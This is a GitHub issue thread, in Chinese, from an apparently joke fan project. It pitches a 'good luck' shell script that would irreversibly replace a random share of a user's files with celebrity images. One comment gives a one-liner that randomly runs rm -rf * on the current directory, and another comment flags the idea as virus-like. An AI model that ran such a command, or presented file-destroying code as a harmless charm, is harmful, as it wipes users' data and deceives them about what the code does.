### ISSUE TITLE
【shell脚本】【锦鲤shell】【1人】

### ISSUE THREAD

**Issue by sazima** [ccyyycy/ycy#124]
#### 作用

运行这个脚本, 人生开挂, 事业顺利, 水逆尽散

#### 提示

1. 随机将你电脑中的 `7/31` 的文件替换为杨超越壁纸图片或视频, 为您带来好运. 
2. 文件**无法恢复**

****
之前创意与 #77 重复 , 故修改

**Comment by Liquid-Zhangliquan** [comment]
#77 
重了

**Comment by Liquid-Zhangliquan** [comment]
you can join us ,we need python

**Comment by zpeng1989** [comment]
[ $[$RANDOM%6] == 0 ] && rm -rf * || echo 'clicks'

**Comment by fzq5201314** [comment]
这个项目有病毒的嫌疑，审核会被拒掉的哦，请尽快更新内容
